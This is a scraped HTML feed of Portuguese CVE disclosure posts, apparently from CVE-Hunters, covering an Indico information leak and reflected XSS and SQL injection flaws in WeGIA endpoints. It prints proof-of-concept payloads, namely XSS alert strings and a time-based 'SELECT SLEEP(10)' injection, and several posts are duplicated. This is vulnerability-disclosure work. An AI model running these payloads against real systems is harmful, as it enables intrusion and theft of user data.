<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">Script</span> <span class="n">PoC</span> <span class="n">a</span> <span class="n">ser</span> <span class="n">publicado</span> <span class="n">após</span> <span class="n">o</span> <span class="n">cronograma</span> <span class="n">de</span> <span class="n">divulgação</span> <span class="n">responsável</span><span class="o">.</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53640/image.png" width="598" height="396" srcset="/p/cve-2025-53640/image_hu_6c6de36b9674a4e6.png 480w, /p/cve-2025-53640/image_hu_cfef9b4e7402de52.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="151" data-flex-basis="362px" /></p> <p><img src="/p/cve-2025-53640/image-1.png" width="601" height="725" srcset="/p/cve-2025-53640/image-1_hu_af3a0c7700a339e3.png 480w, /p/cve-2025-53640/image-1_hu_80b649f3bc1e6dce.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="82" data-flex-basis="198px" /></p> <h2 id="impacto-global">Impacto Global </h2><p style="text-align: justify;">O Indico é uma plataforma de gerenciamento de eventos e conferências amplamente adotada, desenvolvida pelo CERN (Organização Europeia para Pesquisa Nuclear), que impulsiona a infraestrutura acadêmica e institucional globalmente: <ul> <li><b>CERN (Organização Europeia para Pesquisa Nuclear):</b> Mais de 900.000 eventos anualmente; Mais de 200 salas reservadas diariamente.</li> <li><b>Mundial:</b> Cerca de 145.000 eventos/ano em mais de 300 instituições.</li> <li><b>ONU (Organização das Nações Unidas):</b> Mais de 180.000 participantes/ano.</li> <li><b>UNOG (Escritório das Nações Unidas em Genebra):</b> Até 700.000 usuários/ano.</li> <li>Amplamente utilizado por universidades, laboratórios, institutos de pesquisa e agências governamentais.</li> </ul> </p> <p style="text-align: justify;">Exemplos de instâncias públicas afetadas: <ul> <li><b><a href="https://indico.cern.ch/" target="_blank">https://indico.cern.ch/<a></b></li> <li><b><a href="https://indico.esa.int/" target="_blank">https://indico.esa.int/<a></b></li> <li><b><a href="https://indico.mit.edu/" target="_blank">https://indico.mit.edu/<a></b></li> </ul> </p> <p style="text-align: justify;">Devido à sua ampla adoção em ambientes <b>científicos, acadêmicos e governamentais</b>, esta vulnerabilidade apresenta sérios riscos: <ul> <li>Vazamento de identidade de pesquisadores, funcionários e administradores.</li> <li>Violações de privacidade em larga escala e exposição de diretórios institucionais.</li> <li>Reconhecimento direcionado para phishing ou engenharia social.</li> <li>Possível comprometimento de pesquisas e iniciativas políticas sensíveis.</li> </ul> </p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Divulgação de dados pessoais (PII)</li> <li>Enumeração de usuários com privilégios altos (administradores, organizadores)</li> <li>Suporta operações de phishing em massa e spear-phishing</li> <li>Viola regulamentações como <b>GDPR, LGPD</b> e políticas institucionais internas</li> <li>Pode constituir uma violação passível de notificação, dependendo da jurisdição</li> </ul> </p> <h2 id="referências">Referências </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md</a></strong></p> <p><strong><a class="link" href="https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj" target="_blank" rel="noopener" >https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj</a></strong></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 14 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53824/ https://www.cvehunters.com/pt/p/cve-2025-53824/ <h2 id="cve-2025-53824-cross-site-scripting-xss-refletido-no-endpoint-cadastro_petphp-parâmetro-msg">CVE-2025-53824: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_pet.php</code> parâmetro <code>msg</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53824" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53824</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_pet.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>msg</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET html/pet/cadastro_pet.php</code></p> <p>Parâmetro: <code>msg</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>msg</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53824-cross-site-scripting-xss-refletido-no-endpoint-cadastro_petphp-parâmetro-msg">CVE-2025-53824: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_pet.php</code> parâmetro <code>msg</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53824" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53824</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_pet.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>msg</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET html/pet/cadastro_pet.php</code></p> <p>Parâmetro: <code>msg</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>msg</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s1">';alert(String.fromCharCode(88,83,83))//'</span><span class="p">;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</span><span class="c1">//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53824/image.png" width="909" height="195" srcset="/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="466" data-flex-basis="1118px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 14 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53377/ https://www.cvehunters.com/pt/p/cve-2025-53377/ <h2 id="cve-2025-53377-cross-site-scripting-xss-refletido-no-endpoint-cadastro_dependente_pessoa_novaphp-parâmetro-id_funcionario">CVE-2025-53377: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_dependente_pessoa_nova.php</code> parâmetro <code>id_funcionario</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53377" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53377</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_dependente_pessoa_nova.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id_funcionario</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/funcionario/cadastro_dependente_pessoa_nova.php</code></p> <p>Parâmetro: <code>id_funcionario</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id_funcionario</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53377-cross-site-scripting-xss-refletido-no-endpoint-cadastro_dependente_pessoa_novaphp-parâmetro-id_funcionario">CVE-2025-53377: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_dependente_pessoa_nova.php</code> parâmetro <code>id_funcionario</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53377" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53377</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_dependente_pessoa_nova.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id_funcionario</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/funcionario/cadastro_dependente_pessoa_nova.php</code></p> <p>Parâmetro: <code>id_funcionario</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id_funcionario</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="mi">1</span><span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53377/image.png" width="783" height="830" srcset="/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="94" data-flex-basis="226px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53525/ https://www.cvehunters.com/pt/p/cve-2025-53525/ <h2 id="cve-2025-53525-cross-site-scripting-xss-refletido-no-endpoint-profile_familiarphp-parâmetro-id_dependente">CVE-2025-53525: Cross-Site Scripting (XSS) Refletido no endpoint <code>profile_familiar.php</code> parâmetro <code>id_dependente</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53525" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53525</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>profile_familiar.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id_dependente</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/atendido/profile_familiar.php</code></p> <p>Parâmetro: <code>id_dependente</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id_dependente</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53525-cross-site-scripting-xss-refletido-no-endpoint-profile_familiarphp-parâmetro-id_dependente">CVE-2025-53525: Cross-Site Scripting (XSS) Refletido no endpoint <code>profile_familiar.php</code> parâmetro <code>id_dependente</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53525" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53525</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>profile_familiar.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id_dependente</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/atendido/profile_familiar.php</code></p> <p>Parâmetro: <code>id_dependente</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id_dependente</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53525/image.png" width="719" height="387" srcset="/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <p><img src="/p/cve-2025-53525/image-1.png" width="1071" height="559" srcset="/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53527/ https://www.cvehunters.com/pt/p/cve-2025-53527/ <h2 id="cve-2025-53527-vulnerabilidade-de-injeção-sql-nos-parâmetros-tipo-e-responsavel-do-endpoint-relatorio_geracaophp">CVE-2025-53527: Vulnerabilidade de Injeção SQL nos parâmetros <code>tipo</code> e <code>responsavel</code> do endpoint <code>relatorio_geracao.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53527" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53527</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Injeção SQL foi identificada nos parâmetros <code>tipo</code> e <code>responsavel</code> do endpoint <code>/controle/relatorio_geracao.php</code>. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/controle/relatorio_geracao.php</code></p> <p>Parâmetros: <code>tipo</code> e <code>responsavel</code></p> <h2 id="poc">PoC </h2><h3 id="requisição-normal">Requisição Normal: </h3><p><img src="/p/cve-2025-53527/image.png" width="1772" height="846" srcset="/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" ></p><h2 id="cve-2025-53527-vulnerabilidade-de-injeção-sql-nos-parâmetros-tipo-e-responsavel-do-endpoint-relatorio_geracaophp">CVE-2025-53527: Vulnerabilidade de Injeção SQL nos parâmetros <code>tipo</code> e <code>responsavel</code> do endpoint <code>relatorio_geracao.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53527" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53527</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Injeção SQL foi identificada nos parâmetros <code>tipo</code> e <code>responsavel</code> do endpoint <code>/controle/relatorio_geracao.php</code>. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/controle/relatorio_geracao.php</code></p> <p>Parâmetros: <code>tipo</code> e <code>responsavel</code></p> <h2 id="poc">PoC </h2><h3 id="requisição-normal">Requisição Normal: </h3><p><img src="/p/cve-2025-53527/image.png" width="1772" height="846" srcset="/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" /></p> <h3 id="sql-injection-no-parâmetro-tipo">SQL Injection no parâmetro <code>tipo</code> </h3><h4 id="payload">Payload: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> ;SELECT SLEEP(10)# </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53527/image-1.png" width="1772" height="844" srcset="/p/cve-2025-53527/image-1_hu_c53ce822599b86e2.png 480w, /p/cve-2025-53527/image-1_hu_d3264b015af14a6d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="503px" /></p> <h3 id="sql-injection-no-parâmetro-responsavel">SQL Injection no parâmetro <code>responsavel</code> </h3><h4 id="payload-1">Payload: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> ;SELECT SLEEP(10)# </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53527/image-2.png" width="1771" height="848" srcset="/p/cve-2025-53527/image-2_hu_44bcaa97ca684007.png 480w, /p/cve-2025-53527/image-2_hu_5c23286a79e2c0ab.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="208" data-flex-basis="501px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados sensíveis: Um invasor pode acessar informações confidenciais, como credenciais, dados pessoais ou financeiros.</li> <li>Comprometimento de contas de usuários: Usando credenciais roubadas, invasores podem obter acesso total ao aplicativo e executar ações em nome de usuários legítimos.</li> <li>Exfiltração de dados: Possibilidade de roubo de grandes volumes de informações, despejando tabelas inteiras do banco de dados.</li> <li>Danos à reputação: Expor dados de clientes ou informações comerciais pode prejudicar significativamente a Imagem da organização.</li> <li>Execução de ataques em cadeia: As informações obtidas podem ser usadas para realizar novos ataques, como phishing direcionado ou ataques a sistemas interconectados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53529/ https://www.cvehunters.com/pt/p/cve-2025-53529/ <h2 id="cve-2025-53529-vulnerabilidade-de-injeção-sql-no-parâmetro-id_funcionario-do-endpoint-profile_funcionariophp">CVE-2025-53529: Vulnerabilidade de Injeção SQL no parâmetro <code>id_funcionario</code> do Endpoint <code>profile_funcionario.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53529" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53529</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_funcionario</code> do endpoint <code>html/funcionario/profile_funcionario.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-53529-vulnerabilidade-de-injeção-sql-no-parâmetro-id_funcionario-do-endpoint-profile_funcionariophp">CVE-2025-53529: Vulnerabilidade de Injeção SQL no parâmetro <code>id_funcionario</code> do Endpoint <code>profile_funcionario.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53529" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53529</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_funcionario</code> do endpoint <code>html/funcionario/profile_funcionario.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>html/funcionario/profile_funcionario.php</code></p> <p>Parâmetro: <code>id_funcionario</code></p> <p 